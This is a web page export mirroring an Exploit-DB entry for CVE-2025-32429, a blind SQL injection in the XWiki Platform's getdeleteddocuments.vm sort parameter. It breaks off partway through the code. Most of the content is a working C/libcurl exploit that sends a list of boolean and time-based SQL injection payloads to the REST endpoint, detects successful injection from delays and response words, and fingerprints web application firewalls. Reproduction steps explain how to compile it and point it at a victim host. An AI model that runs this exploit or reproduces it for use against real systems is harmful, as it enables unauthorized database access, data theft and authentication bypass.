{"id":9195,"date":"2025-07-29T03:38:26","date_gmt":"2025-07-29T03:38:26","guid":{"rendered":"http:\/\/localhost\/?p=9195"},"modified":"2025-07-29T03:38:26","modified_gmt":"2025-07-29T03:38:26","slug":"xwiki-14-sql-injection-via-getdeleteddocumentsvm","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=9195","title":{"rendered":"XWiki 14 &#8211; SQL Injection via getdeleteddocuments.vm"},"content":{"rendered":"<h2>Exploit Details<\/h2>\n<h3>Basic Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit Title<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">XWiki 14 &#8211; SQL Injection via getdeleteddocuments.vm<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit ID<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">EDB-ID:52384<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Type<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">exploitdb<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Published<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-07-28T00:00:00<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Modified<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-07-28T00:00:00<\/td>\n<\/tr>\n<\/table>\n<h3>CVSS Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">CVSS Score<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">9.3<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Severity<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd; color: #cc0000; font-weight: bold;\">CRITICAL<\/td>\n<\/tr>\n<tr>\n<th 
style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Vector<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:N\/UI:N\/VC:H\/SC:N\/VI:H\/SI:N\/VA:H\/SA:N<\/td>\n<\/tr>\n<\/table>\n<h3>CVE Information<\/h3>\n<div style=\" padding: 15px; border: 1px solid #ddd; margin-bottom: 20px;\">\n<ul style=\"margin: 0; padding-left: 20px;\">\n<li>CVE-2025-32429<\/li>\n<\/ul>\n<\/div>\n<h3>Exploit Description<\/h3>\n<div style=\" padding: 15px; border-left: 4px solid #4CAF50; margin-bottom: 20px;\">\nExploit Title: XWiki 14 &#8211; SQL Injection via getdeleteddocuments.vm Google&#8230;\n<\/div>\n<h3>Exploit Code<\/h3>\n<div style=\" color: #d4d4d4; padding: 15px; border: 1px solid #ddd; margin-bottom: 20px; font-family: 'Courier New', monospace; white-space: pre-wrap; overflow-x: auto;\">\n# Exploit Title: XWiki 14 &#8211; SQL Injection via getdeleteddocuments.vm<br \/>\n<br \/># Google Dork: N\/A<br \/>\n<br \/># Date: 28 July 2025<br \/>\n<br \/># Exploit Author: Byte Reaper<br \/>\n<br \/># LinkedIn: N\/A<br \/>\n<br \/># Vendor Homepage: https:\/\/www.xwiki.org<br \/>\n<br \/># Software Link: https:\/\/www.xwiki.org<br \/>\n<br \/># Version: XWiki Platform \u2264 14.x<br \/>\n<br \/># Tested on: XWiki Platform \u2264 14.x<br \/>\n<br \/># CVE: CVE-2025-32429<\/p>\n<p>## Vulnerability Description<\/p>\n<p>A blind SQL Injection vulnerability exists in the XWiki Platform\u2019s `getdeleteddocuments.vm` template, specifically via the `sort` parameter. The vulnerability can be exploited by sending a crafted payload to the following REST endpoint:<\/p>\n<p>```<br \/>\n<br \/>\/xwiki\/rest\/liveData\/sources\/liveTable\/entries?sourceParams.template=getdeleteddocuments.vm&#038;sort=&lt;PAYLOAD&gt;<br \/>\n<br \/>```<\/p>\n<p>An attacker can inject arbitrary SQL statements into the underlying database query, resulting in data exfiltration, authentication bypass, or denial of service. 
The vulnerability was verified on XWiki Platform versions up to 14.x using a C-based curl exploit.<\/p>\n<p>## Steps to Reproduce<\/p>\n<p>1. Save the provided `exploit.c` file to your local environment.<br \/>\n<br \/>2. Compile the PoC:<br \/>\n<br \/>   ```<br \/>\n<br \/>   gcc -o exploit exploit.c argparse.c -lcurl<br \/>\n<br \/>   ```<br \/>\n<br \/>3. Execute against a vulnerable instance:<br \/>\n<br \/>   ```<br \/>\n<br \/>   .\/exploit -u http:\/\/victim.example.com\/xwiki<br \/>\n<br \/>   ```<br \/>\n<br \/>4. Observe response delays or injected content indicating successful SQL execution.<\/p>\n<p>## Proof of Concept<\/p>\n<p>- GitHub PoC: https:\/\/github.com\/byteReaper77\/CVE-2025-32429\/blob\/main\/exploit.c<\/p>\n<p>\/*<br \/>\n<br \/> * Author       : Byte Reaper<br \/>\n<br \/> * Telegram     : @ByteReaper0<br \/>\n<br \/> * CVE          : CVE-2025-32429<br \/>\n<br \/> * Vulnerability: SQL Injection<br \/>\n<br \/> * Description : A vulnerability in the xwiki platform using the sort operator in the getdeleteddocuments.vm file, which leads to injecting malicious SQL statements into the sort= parameter.<br \/>\n<br \/> * ------------------------------------------------------------<br \/>\n<br \/> *\/<\/p>\n<p>#include &lt;stdio.h&gt;<br \/>\n<br \/>#include &lt;string.h&gt;<br \/>\n<br \/>#include &lt;curl\/curl.h&gt;<br \/>\n<br \/>#include &quot;argparse.h&quot;<br \/>\n<br \/>#include &lt;time.h&gt;<br \/>\n<br \/>#include &lt;stdlib.h&gt;<br \/>\n<br \/>#include &lt;unistd.h&gt;<br \/>\n<br \/>#define URL 2500<br \/>\n<br \/>const char *yourUrl = NULL;<br \/>\n<br \/>int verbose = 0;<br \/>\n<br \/>int selecetCookie = 0;<br \/>\n<br \/>const char *cookies = NULL;<\/p>\n<p>void exitAssembly()<br \/>\n<br 
\/>{<br \/>\n<br \/>    __asm__ volatile<br \/>\n<br \/>    (<br \/>\n<br \/>        &#8220;xor %%rdi, %%rdi\\n\\t&#8221;<br \/>\n<br \/>        &#8220;mov $231, %%rax\\n\\t&#8221;<br \/>\n<br \/>        &#8220;syscall\\n\\t&#8221;<br \/>\n<br \/>        :<br \/>\n<br \/>        :<br \/>\n<br \/>        : &#8220;rax&#8221;,<br \/>\n<br \/>          &#8220;rdi&#8221;<br \/>\n<br \/>    );<br \/>\n<br \/>}<br \/>\n<br \/>struct Mem<br \/>\n<br \/>{<br \/>\n<br \/>    char *buffer;<br \/>\n<br \/>    size_t len;<br \/>\n<br \/>};<br \/>\n<br \/>size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata)<br \/>\n<br \/>{<br \/>\n<br \/>    size_t total = size * nmemb;<br \/>\n<br \/>    struct Mem *m = (struct Mem *)userdata;<br \/>\n<br \/>    char *tmp = realloc(m->buffer, m->len + total + 1);<br \/>\n<br \/>    if (tmp == NULL)<br \/>\n<br \/>    {<br \/>\n<br \/>        printf(&#8220;\\e[1;31m[-] Failed to allocate memory!\\e[0m\\n&#8221;);<br \/>\n<br \/>        exitAssembly();<br \/>\n<br \/>    }<br \/>\n<br \/>    m->buffer = tmp;<br \/>\n<br \/>    memcpy(&#038;(m->buffer[m->len]), ptr, total);<br \/>\n<br \/>    m->len += total;<br \/>\n<br \/>    m->buffer[m->len] = &#8216;\\0&#8217;;<br \/>\n<br \/>    return total;<br \/>\n<br \/>}<br \/>\n<br \/>const char *payload[] =<br \/>\n<br \/>{<br \/>\n<br \/>    &#8220;&#8216; OR &#8216;1&#8221;,<br \/>\n<br \/>    &#8221; &#8216; OR 1 &#8212; -&#8220;,<br \/>\n<br \/>    &#8221; OR &#8220;&#8221; = &#8220;,<br \/>\n<br \/>    &#8220;\\&#8221; OR 1 = 1 &#8212; -&#8220;,<br \/>\n<br \/>    &#8220;,(select * from (select(sleep(5)))a)&#8221;,<br \/>\n<br \/>    &#8220;%2c(select%20*%20from%20(select(sleep(5)))a)&#8221;,<br \/>\n<br \/>    &#8220;&#8216;;WAITFOR DELAY &#8216;0:0:05&#8217;&#8211;&#8220;,<br \/>\n<br \/>    &#8220;AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND &#8216;%&#8217;='&#8221;,<br \/>\n<br \/>    &#8220;AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)&#8221;,<br \/>\n<br \/>    &#8220;AND 
(SELECT * FROM (SELECT(SLEEP(5)))nQIP)&#8211;&#8220;,<br \/>\n<br \/>    &#8220;AS INJECTX WHERE 1=1 AND 1=0&#8211;&#8220;,<br \/>\n<br \/>    &#8220;WHERE 1=1 AND 1=1&#8221;<br \/>\n<br \/>};<br \/>\n<br \/>const char *word[] =<br \/>\n<br \/>{<br \/>\n<br \/>    &#8220;select&#8221;,<br \/>\n<br \/>    &#8220;union&#8221;,<br \/>\n<br \/>    &#8220;insert&#8221;,<br \/>\n<br \/>    &#8220;update&#8221;,<br \/>\n<br \/>    &#8220;delete&#8221;,<br \/>\n<br \/>    &#8220;drop&#8221;,<br \/>\n<br \/>    &#8220;create&#8221;,<br \/>\n<br \/>    &#8220;alter&#8221;,<br \/>\n<br \/>    &#8220;truncate&#8221;,<br \/>\n<br \/>    &#8220;replace&#8221;,<br \/>\n<br \/>    &#8220;or&#8221;,<br \/>\n<br \/>    &#8220;and&#8221;,<br \/>\n<br \/>    &#8220;not&#8221;,<br \/>\n<br \/>    &#8220;1=1&#8221;,<br \/>\n<br \/>    &#8220;1=0&#8221;,<br \/>\n<br \/>    &#8220;&#8211;&#8220;,<br \/>\n<br \/>    &#8220;#&#8221;,<br \/>\n<br \/>    &#8220;\/*&#8221;,<br \/>\n<br \/>    &#8220;*\/&#8221;,<br \/>\n<br \/>    &#8220;sleep&#8221;,<br \/>\n<br \/>    &#8220;benchmark&#8221;,<br \/>\n<br \/>    &#8220;load_file&#8221;,<br \/>\n<br \/>    &#8220;outfile&#8221;,<br \/>\n<br \/>    &#8220;error&#8221;,<br \/>\n<br \/>    &#8220;warning&#8221;,<br \/>\n<br \/>    &#8220;mysql&#8221;,<br \/>\n<br \/>    &#8220;pg_&#8221;,<br \/>\n<br \/>    &#8220;exec&#8221;,<br \/>\n<br \/>    &#8220;xp_&#8221;,<br \/>\n<br \/>    &#8220;admin&#8221;,<br \/>\n<br \/>    &#8220;root&#8221;,<br \/>\n<br \/>    &#8220;&#8221;<br \/>\n<br \/>};<\/p>\n<p>int numberPayload = sizeof(payload) \/ sizeof(payload[0]);<br \/>\n<br \/>int numberWord = sizeof(word) \/ sizeof(word[0]);<br \/>\n<br \/>char full[URL];<\/p>\n<p>void injection(const char *baseUrl)<br \/>\n<br \/>{<br \/>\n<br \/>    CURLcode res ;<br \/>\n<br \/>    CURL *curl = curl_easy_init();<br \/>\n<br \/>    struct  Mem response =<br \/>\n<br \/>    {<br \/>\n<br \/>        NULL,<br \/>\n<br \/>        0<\/p>\n<p>    };<br \/>\n<br \/>    
if (curl == NULL)<br \/>\n<br \/>    {<br \/>\n<br \/>        printf(&#8220;\\e[1;31m[-] Error Create Object Curl !\\e[0m\\n&#8221;);<br \/>\n<br \/>        printf(&#8220;\\e[1;31m[-] Check Your Connection (Ping)&#8230;\\e[0m\\n&#8221;);<br \/>\n<br \/>        printf(&#8220;\\e[1;31m[-] Command : ping google.com\\n&#8221;);<br \/>\n<br \/>        const char *pingCommand = &#8220;\/bin\/ping&#8221;;<br \/>\n<br \/>        const char *argv[]      = {&#8220;ping&#8221;, &#8220;-c&#8221;, &#8220;5&#8221;, &#8220;google.com&#8221;, NULL};<br \/>\n<br \/>        const char *envp[]      = {NULL};<br \/>\n<br \/>        __asm__ volatile<br \/>\n<br \/>        (<br \/>\n<br \/>            &#8220;mov %[argv], %%rsi\\n\\t&#8221;<br \/>\n<br \/>            &#8220;mov $59, %%rax\\n\\t&#8221;<br \/>\n<br \/>            &#8220;mov %[envp], %%rdx\\n\\t&#8221;<br \/>\n<br \/>            &#8220;mov %[command], %%rdi\\n\\t&#8221;<br \/>\n<br \/>            &#8220;syscall\\n\\t&#8221;<br \/>\n<br \/>            &#8220;cmp $0, %%rax\\n\\t&#8221;<br \/>\n<br \/>            &#8220;jl exitSyscall\\n\\t&#8221;<br \/>\n<br \/>            &#8220;exitSyscall:\\n\\t&#8221;<br \/>\n<br \/>            &#8220;mov $0x3C, %%rax\\n\\t&#8221;<br \/>\n<br \/>            &#8220;xor %%rdi, %%rdi\\n\\t&#8221;<br \/>\n<br \/>            &#8220;syscall\\n\\t&#8221;<br \/>\n<br \/>            &#8220;.2:\\n\\t&#8221;<br \/>\n<br \/>            :<br \/>\n<br \/>            : [argv] &#8220;r&#8221; (argv),<br \/>\n<br \/>              [envp] &#8220;r&#8221; (envp),<br \/>\n<br \/>              [command] &#8220;r&#8221; (pingCommand)<br \/>\n<br \/>            : &#8220;rax&#8221;,<br \/>\n<br \/>              &#8220;rdi&#8221;,<br \/>\n<br \/>              &#8220;rsi&#8221;,<br \/>\n<br \/>              &#8220;rdx&#8221;<br \/>\n<br \/>        );<br \/>\n<br \/>    }<\/p>\n<p>    response.buffer = NULL;<br \/>\n<br \/>    response.len = 0;<br \/>\n<br \/>    if (verbose)<br \/>\n<br \/>    {<br \/>\n<br \/>     
   printf(&#8220;\\e[1;35m==========================================\\e[0m\\n&#8221;);<br \/>\n<br \/>        printf(&#8220;\\e[1;33m[+] Cleaning Response&#8230;\\e[0m\\n&#8221;);<br \/>\n<br \/>        printf(&#8220;\\e[1;33m[+] Response Buffer : %s\\e[0m\\n&#8221;,response.buffer);<br \/>\n<br \/>        printf(&#8220;\\e[1;33m[+] Response Len : %d\\e[0m\\n&#8221;,response.len);<br \/>\n<br \/>        printf(&#8220;\\e[1;35m==========================================\\e[0m\\n&#8221;);<br \/>\n<br \/>    }<\/p>\n<p>    if (curl)<br \/>\n<br \/>    {<br \/>\n<br \/>        int n = 0;<br \/>\n<br \/>        for (int p = 0; p < numberPayload; p++)\n<br \/>        {<br \/>\n<br \/>            char *encodePayload = curl_easy_escape(curl,<br \/>\n<br \/>                                                   payload[p],<br \/>\n<br \/>                                                   0);<br \/>\n<br \/>            if (!encodePayload)<br \/>\n<br \/>            {<br \/>\n<br \/>                printf(&#8220;\\e[1;31m[-] Error Encode Payload !\\e[0m\\n&#8221;);<br \/>\n<br \/>                exitAssembly();<br \/>\n<br \/>            }<br \/>\n<br \/>            snprintf(full,<br \/>\n<br \/>                     sizeof(full),<br \/>\n<br \/>                     &#8220;%s\/xwiki\/rest\/liveData\/sources\/liveTable\/entries?sourceParams.template=getdeleteddocuments.vm&#038;sort=%s&#8221;,<br \/>\n<br \/>                     baseUrl,<br \/>\n<br \/>                     encodePayload);<\/p>\n<p>            printf(&#8220;\\e[1;34m[+] Encode Payload Successfully.\\e[0m\\n&#8221;);<br \/>\n<br \/>            printf(&#8220;\\e[1;34m[+] Payload Encode : %s\\e[0m\\n&#8221;, encodePayload);<\/p>\n<p>            curl_easy_setopt(curl,<br \/>\n<br \/>                             CURLOPT_URL,<br \/>\n<br \/>                             full);<br \/>\n<br \/>            struct timespec ts;<br \/>\n<br \/>            ts.tv_sec = 0;<br \/>\n<br \/>            ts.tv_nsec = 10000000;<br \/>\n<br 
\/>            printf(&#8220;\\e[1;34m[+] sys_nanosleep syscall (10000000)&#8230;\\e[0m\\n&#8221;);<br \/>\n<br \/>            __asm__  volatile<br \/>\n<br \/>            (<br \/>\n<br \/>                &#8220;mov $35, %%rax\\n\\t&#8221;<br \/>\n<br \/>                &#8220;mov %[ts], %%rdi\\n\\t&#8221;<br \/>\n<br \/>                &#8220;xor %%rsi, %%rsi\\n\\t&#8221;<br \/>\n<br \/>                &#8220;syscall\\n\\t&#8221;<br \/>\n<br \/>                :<br \/>\n<br \/>                : [ts] &#8220;r&#8221; (&#038;ts)<br \/>\n<br \/>                :&#8221;rax&#8221;, &#8220;rdi&#8221;, &#8220;rsi&#8221;<\/p>\n<p>            );<br \/>\n<br \/>            if (selecetCookie)<br \/>\n<br \/>            {<br \/>\n<br \/>                curl_easy_setopt(curl,<br \/>\n<br \/>                                 CURLOPT_COOKIEFILE,<br \/>\n<br \/>                                 cookies);<br \/>\n<br \/>                curl_easy_setopt(curl,<br \/>\n<br \/>                                 CURLOPT_COOKIEJAR,<br \/>\n<br \/>                                 cookies);<\/p>\n<p>            }<br \/>\n<br \/>            curl_easy_setopt(curl,<br \/>\n<br \/>                             CURLOPT_FOLLOWLOCATION,<br \/>\n<br \/>                             1L);<br \/>\n<br \/>            curl_easy_setopt(curl,<br \/>\n<br \/>                             CURLOPT_WRITEFUNCTION,<br \/>\n<br \/>                             write_cb);<br \/>\n<br \/>            if (verbose)<br \/>\n<br \/>            {<br \/>\n<br \/>                printf(&#8220;\\e[1;35m&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;[Verbose Curl]&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;\\e[0m\\n&#8221;);<br \/>\n<br \/>                curl_easy_setopt(curl,<br \/>\n<br \/>                                 CURLOPT_VERBOSE,<br \/>\n<br \/>                                 1L);<br \/>\n<br \/>            }<br 
\/>\n<br \/>            curl_easy_setopt(curl,<br \/>\n<br \/>                             CURLOPT_WRITEDATA,<br \/>\n<br \/>                             &#038;response);<br \/>\n<br \/>            curl_easy_setopt(curl,<br \/>\n<br \/>                             CURLOPT_CONNECTTIMEOUT,<br \/>\n<br \/>                             5L);<br \/>\n<br \/>            curl_easy_setopt(curl,<br \/>\n<br \/>                             CURLOPT_TIMEOUT,<br \/>\n<br \/>                             10L);<br \/>\n<br \/>            curl_easy_setopt(curl,<br \/>\n<br \/>                             CURLOPT_SSL_VERIFYPEER,<br \/>\n<br \/>                             0L);<br \/>\n<br \/>            curl_easy_setopt(curl,<br \/>\n<br \/>                             CURLOPT_SSL_VERIFYHOST,<br \/>\n<br \/>                             0L);<br \/>\n<br \/>            struct curl_slist *headers = NULL;<br \/>\n<br \/>            headers = curl_slist_append(headers,<br \/>\n<br \/>                                        &#8220;Accept-Language: en-US,en&#8221;);<br \/>\n<br \/>            headers = curl_slist_append(headers,<br \/>\n<br \/>                                        &#8220;Connection: keep-alive&#8221;);<br \/>\n<br \/>            headers = curl_slist_append(headers,<br \/>\n<br \/>                                        &#8220;Referer: http:\/\/example.com&#8221;);<br \/>\n<br \/>            double delayTime;<br \/>\n<br \/>            clock_t start = clock();<br \/>\n<br \/>            res = curl_easy_perform(curl);<br \/>\n<br \/>            printf(&#8220;\\e[1;34m+] Payload : %s\\e[0m\\n&#8221;, payload[p]);<br \/>\n<br \/>            printf(&#8220;\\e[1;34m[+] Encode Payload %s\\e[0m\\n&#8221;, encodePayload);<br \/>\n<br \/>            printf(&#8220;\\e[1;32m[*] PID : %d\\e[0m\\n&#8221;, getpid());<br \/>\n<br \/>            curl_free(encodePayload);<br \/>\n<br \/>            curl_slist_free_all(headers);<br \/>\n<br \/>            usleep(1000000);<br \/>\n<br \/>     
       if (res == CURLE_OK)<br \/>\n<br \/>            {<\/p>\n<p>                printf(&#8220;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;\\n&#8221;);<br \/>\n<br \/>                long httpCode  = 0;<br \/>\n<br \/>                curl_easy_getinfo(curl,<br \/>\n<br \/>                                  CURLINFO_RESPONSE_CODE,<br \/>\n<br \/>                                  &#038;httpCode);<br \/>\n<br \/>                curl_easy_getinfo(curl,<br \/>\n<br \/>                                  CURLINFO_TOTAL_TIME,<br \/>\n<br \/>                                  &#038;delayTime);<br \/>\n<br \/>                printf(&#8220;\\e[1;36m[+] Request sent successfully\\e[0m\\n&#8221;);<br \/>\n<br \/>                printf(&#8220;\\e[1;34m[+] Delay Time Response : %f\\e[0m\\n&#8221;,<br \/>\n<br \/>                       delayTime);<br \/>\n<br \/>                printf(&#8220;\\e[1;37m[+] Input Url : %s\\e[0m\\n&#8221;,<br \/>\n<br \/>                       baseUrl);<br \/>\n<br \/>                printf(&#8220;\\e[1;37m[+] Full Url : %s\\e[0m\\n&#8221;,<br \/>\n<br \/>                       full);<br \/>\n<br \/>                printf(&#8220;\\e[1;32m[+] Http Code -> %ld\\e[0m\\n&#8221;, httpCode);<br \/>\n<br \/>                if (httpCode >= 200 &#038;&#038; httpCode < 300)\n<br \/>                {<br \/>\n<br \/>                    clock_t end = clock();<br \/>\n<br \/>                    double timeInjection  = (double) (end  &#8211; start )\/ CLOCKS_PER_SEC;<br \/>\n<br \/>                    printf(&#8220;\\e[1;36m[+] Positive Http Code (200 < 300) : %ld\\n\",httpCode);\n<br \/>                    for (int w = 0; w < numberWord; w++)\n<br \/>                    {<br \/>\n<br \/>                        if (strstr(response.buffer, word[w]) != NULL)<br \/>\n<br \/>                        {<br \/>\n<br \/>                            
printf(&#8220;\\e[1;34m[+] A suspicious word was found in the server&#8217;s response !!\\e[0m\\n&#8221;);<br \/>\n<br \/>                            printf(&#8220;\\e[1;34m[+] Word Found : %s\\e[0m\\n&#8221;, word[w]);<br \/>\n<br \/>                            printf(&#8220;[+] The vulnerability CVE-2025-32429 exists on the server\\e[0m\\n&#8221;);<br \/>\n<br \/>                            printf(&#8220;\\e[1;37m\\n======================================== [Response Server] ========================================\\e[0m\\n&#8221;);<br \/>\n<br \/>                            printf(&#8220;%s\\n&#8221;, response.buffer);<br \/>\n<br \/>                            printf(&#8220;\\e[1;32m[Len] : %d\\e[0m\\n&#8221;, response.len);<br \/>\n<br \/>                            printf(&#8220;\\e[1;37m\\n==================================================================================================\\e[0m\\n&#8221;);<br \/>\n<br \/>                            printf(&#8220;[+] Check Timeout Response&#8230;\\e[0m\\n&#8221;);<br \/>\n<br \/>                            if (timeInjection >= 7.5)<br \/>\n<br \/>                            {<br \/>\n<br \/>                                printf(&#8220;\\e[1;34m[+] Possible SQL Executed (Delay Detected)\\e[0m\\n&#8221;);<br \/>\n<br \/>                                printf(&#8220;\\e[1;34m[+] The server is experiencing a vulnerability (CVE-2025-32429)\\e[0m\\n&#8221;);<br \/>\n<br \/>                            }<br \/>\n<br \/>                            else<br \/>\n<br \/>                            {<br \/>\n<br \/>                                printf(&#8220;\\e[1;31m[-] No response delay detected !\\e[0m\\n&#8221;);<br \/>\n<br \/>                            }<br \/>\n<br \/>                        }<br \/>\n<br \/>                        else<br \/>\n<br \/>                        {<br \/>\n<br \/>                            printf(&#8220;\\e[1;31m[-] No suspicious words were found in the server response 
!\\e[0m\\n&#8221;);<\/p>\n<p>                        }<br \/>\n<br \/>                    }<br \/>\n<br \/>                }<br \/>\n<br \/>                else<br \/>\n<br \/>                {<br \/>\n<br \/>                    printf(&#8220;\\e[1;31m[-] HTTP Code Not Range Positive (200 < 300) : %ld\\e[0m\\n\", httpCode);\n<br \/>                    printf(&#8220;\\e[1;34m[+] Try Next Payload : %s\\e[0m\\n&#8221;, payload[p]);<br \/>\n<br \/>                }<\/p>\n<p>            }<br \/>\n<br \/>            else<br \/>\n<br \/>            {<br \/>\n<br \/>                printf(&#8220;\\e[1;31m[-] Error Send Request\\e[0m\\n&#8221;);<br \/>\n<br \/>                printf(&#8220;\\e[1;31m[-] Error : %s\\e[0m\\n&#8221;, curl_easy_strerror(res));<br \/>\n<br \/>                printf(&#8220;\\e[1;31m[-] Please Check Your Connection !\\e[0m\\n&#8221;);<br \/>\n<br \/>                exitAssembly();<br \/>\n<br \/>            }<\/p>\n<p>        }<\/p>\n<p>    }<br \/>\n<br \/>    if (response.buffer)<br \/>\n<br \/>    {<br \/>\n<br \/>        free(response.buffer);<br \/>\n<br \/>        response.buffer = NULL;<br \/>\n<br \/>        response.len = 0;<br \/>\n<br \/>    }<br \/>\n<br \/>    curl_easy_cleanup(curl);<br \/>\n<br \/>}<br \/>\n<br \/>void checkWaf(const char *base)<br \/>\n<br \/>{<br \/>\n<br \/>    printf(&#8220;[+] Check Waf ============================================================\\e[0m\\n&#8221;);<br \/>\n<br \/>    struct Mem response = {NULL, 0};<br \/>\n<br \/>    response.buffer = NULL;<br \/>\n<br \/>    response.len = 0;<br \/>\n<br \/>    int step1 = 0;<br \/>\n<br \/>    int step2= 0;<br \/>\n<br \/>    int step3 = 0;<br \/>\n<br \/>    int step4 = 0;<br \/>\n<br \/>    int step5 = 0;<br \/>\n<br \/>    if (verbose)<br \/>\n<br \/>    {<br \/>\n<br \/>        printf(&#8220;\\e[1;33m[+] Response Buffer Cleaning Successfully \\e[0m\\n&#8221;);<br \/>\n<br \/>        printf(&#8220;\\e[1;33m[+] Response Buffer : %s\\e[0m\\n&#8221;, 
response.buffer);<br \/>\n<br \/>        printf(&#8220;\\e[1;33m[+] Response Len : %zu\\e[0m\\n&#8221;, response.len);<br \/>\n<br \/>    }<br \/>\n<br \/>    const char *keyWaf[] =<br \/>\n<br \/>    {<br \/>\n<br \/>        &#8220;Access Denied&#8221;,<br \/>\n<br \/>        &#8220;Request blocked&#8221;,<br \/>\n<br \/>        &#8220;Security violation&#8221;,<br \/>\n<br \/>        &#8220;Your request looks suspicious&#8221;<br \/>\n<br \/>    };<br \/>\n<br \/>    int numberWaf = sizeof(keyWaf) \/ sizeof(keyWaf[0]);<br \/>\n<br \/>    printf(&#8220;\\e[1;34m[+] Base URL : %s\\e[0m\\n&#8221;, base);<br \/>\n<br \/>    CURLcode res;<br \/>\n<br \/>    char fullWaf[URL];<br \/>\n<br \/>    snprintf(fullWaf, sizeof(fullWaf),<br \/>\n<br \/>             &#8220;%s\/xwiki\/rest\/liveData\/sources\/liveTable\/entries?sourceParams.template=getdeleteddocuments.vm&#038;sort=&#8221;&#8221;,<br \/>\n<br \/>             base);<br \/>\n<br \/>    printf(&#8220;\\e[1;34m[+] Full Url : %s\\e[0m\\n&#8221;,fullWaf);<br \/>\n<br \/>    CURL *curl = curl_easy_init();<br \/>\n<br \/>    if (curl == NULL)<br \/>\n<br \/>    {<br \/>\n<br \/>        printf(&#8220;\\e[1;31m[-] Error: Could not initialize CURL.\\e[0m\\n&#8221;);<br \/>\n<br \/>        exitAssembly();<br \/>\n<br \/>    }<\/p>\n<p>    curl_easy_setopt(curl,<br \/>\n<br \/>                     CURLOPT_URL, fullWaf);<br \/>\n<br \/>    curl_easy_setopt(curl,<br \/>\n<br \/>                     CURLOPT_FOLLOWLOCATION,<br \/>\n<br \/>                     1L);<\/p>\n<p>    struct curl_slist *headers = NULL;<br \/>\n<br \/>    headers = curl_slist_append(headers,<br \/>\n<br \/>                                &#8220;User-Agent: sqlmap&#8221;);<br \/>\n<br \/>    curl_easy_setopt(curl,<br \/>\n<br \/>                     CURLOPT_HTTPHEADER,<br \/>\n<br \/>                     headers);<br \/>\n<br \/>    curl_easy_setopt(curl,<br \/>\n<br \/>                     CURLOPT_WRITEDATA,<br \/>\n<br \/>                     
&#038;response);<br \/>\n<br \/>    curl_easy_setopt(curl,<br \/>\n<br \/>                     CURLOPT_WRITEFUNCTION,<br \/>\n<br \/>                     write_cb);<\/p>\n<p>    res = curl_easy_perform(curl);<\/p>\n<p>    double timeD = 0;<br \/>\n<br \/>    long code = 0;<br \/>\n<br \/>    long redirects = 0;<br \/>\n<br \/>    if (res == CURLE_OK)<br \/>\n<br \/>    {<br \/>\n<br \/>        curl_easy_getinfo(curl,<br \/>\n<br \/>                          CURLINFO_REDIRECT_COUNT,<br \/>\n<br \/>                          &#038;redirects);<br \/>\n<br \/>        curl_easy_getinfo(curl,<br \/>\n<br \/>                          CURLINFO_TOTAL_TIME,<br \/>\n<br \/>                          &#038;timeD);<br \/>\n<br \/>        curl_easy_getinfo(curl,<br \/>\n<br \/>                          CURLINFO_RESPONSE_CODE,<br \/>\n<br \/>                          &#038;code);<br \/>\n<br \/>        printf(&#8220;\\e[1;36m[+] Step 1: Check Number redirects\\e[0m\\n&#8221;);<br \/>\n<br \/>        if (redirects > 1)<br \/>\n<br \/>        {<br \/>\n<br \/>            printf(&#8220;\\e[1;35m============= [ WAF DETECTED ] =============\\e[0m\\n&#8221;);<br \/>\n<br \/>            printf(&#8220;\\e[1;34m[+] Suspicious number of redirects: %ld\\e[0m\\n&#8221;, redirects);<br \/>\n<br \/>            printf(&#8220;\\e[1;35m============================================\\e[0m\\n&#8221;);<br \/>\n<br \/>            step1 = 1;<br \/>\n<br \/>        }<br \/>\n<br \/>        else<br \/>\n<br \/>        {<br \/>\n<br \/>            printf(&#8220;[-] Waf not detected (Number redirects)\\e[0m\\n&#8221;);<br \/>\n<br \/>        }<br \/>\n<br \/>        printf(&#8220;\\e[1;34m[+] Request sent with simple payload (&#8221;)\\e[0m\\n&#8221;);<br \/>\n<br \/>        printf(&#8220;\\e[1;35m[+] Step 2: Check HTTP Code\\e[0m\\n&#8221;);<br \/>\n<br \/>        printf(&#8220;\\e[1;32m[+] HTTP Code: %ld\\e[0m\\n&#8221;, code);<br \/>\n<br \/>        if (code == 403 ||<br \/>\n<br \/>            code == 404 
